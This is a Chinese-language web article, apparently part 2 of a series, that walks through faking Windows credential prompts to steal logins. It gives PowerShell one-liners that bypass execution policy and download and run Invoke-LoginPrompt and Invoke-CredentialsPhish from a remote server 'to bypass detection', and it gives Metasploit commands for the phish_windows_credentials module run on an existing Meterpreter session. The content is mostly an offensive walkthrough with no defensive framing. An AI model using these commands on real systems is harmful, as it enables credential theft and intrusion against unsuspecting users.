主页 > 网络知识 > Windows凭证的伪造和窃取技术总结(2)

Windows凭证的伪造和窃取技术总结(2)

 

Windows凭证的伪造和窃取技术总结

 

Matt Nelson开发了一个PowerShell脚本,它能够生成一个可以验证凭证是否有效的输入弹窗,并且只有当输入凭证正确时弹窗才会关闭。该脚本可以通过远程执行,并在命令控制台中显示凭证。

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.13/tmp/Invoke-LoginPrompt.ps1')); Invoke-LoginPrompt

 

Windows凭证的伪造和窃取技术总结

 

Nishang框架同样包含了一个能够创建伪造输入弹窗的PowerShell脚本

 

Windows凭证的伪造和窃取技术总结

 

输入弹窗将包含一条消息,告诉用户执行此操作需要凭据。更具安全意识的用户可能会发现某些内容已在后台执行了,但攻击操作不会同时对所有公司用户执行。

 

Windows凭证的伪造和窃取技术总结

 

当用户的凭据输入到Windows框中时,这些凭据将在命令控制台中显示。

 

Windows凭证的伪造和窃取技术总结

 

或者,我们也可以从远程位置执行该脚本以绕过检测。

powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.0.0.13/tmp/Invoke-CredentialsPhish/ps1')); Invoke-CredentialsPhish

 

Windows凭证的伪造和窃取技术总结

 

Metasploit方法

Metasploit Framework有一个模块,它可以在特定进程或任意进程创建时生成一个输入弹窗,该模块必须跟一个现有的Meterpreter会话绑定。

use post/windows/gather/phish_windows_credentials

set SESSION 3

set PROCESS *

run

 

Windows凭证的伪造和窃取技术总结

 

通配符*指示模块监视系统上运行的所有进程,并等待新实例启动,以便向用户显示伪造的输入提示。

 

Windows凭证的伪造和窃取技术总结

 

输入提示将作为进程的凭证请求显示给用户。

 

Windows凭证的伪造和窃取技术总结

 

当用户输入他的凭据时,这些凭据将被捕获并显示在控制台中。

 

Windows凭证的伪造和窃取技术总结

 

或者,可以将模块配置为仅监视特定进程的创建。

说点什么吧
  • 全部评论(0
    还没有评论,快来抢沙发吧!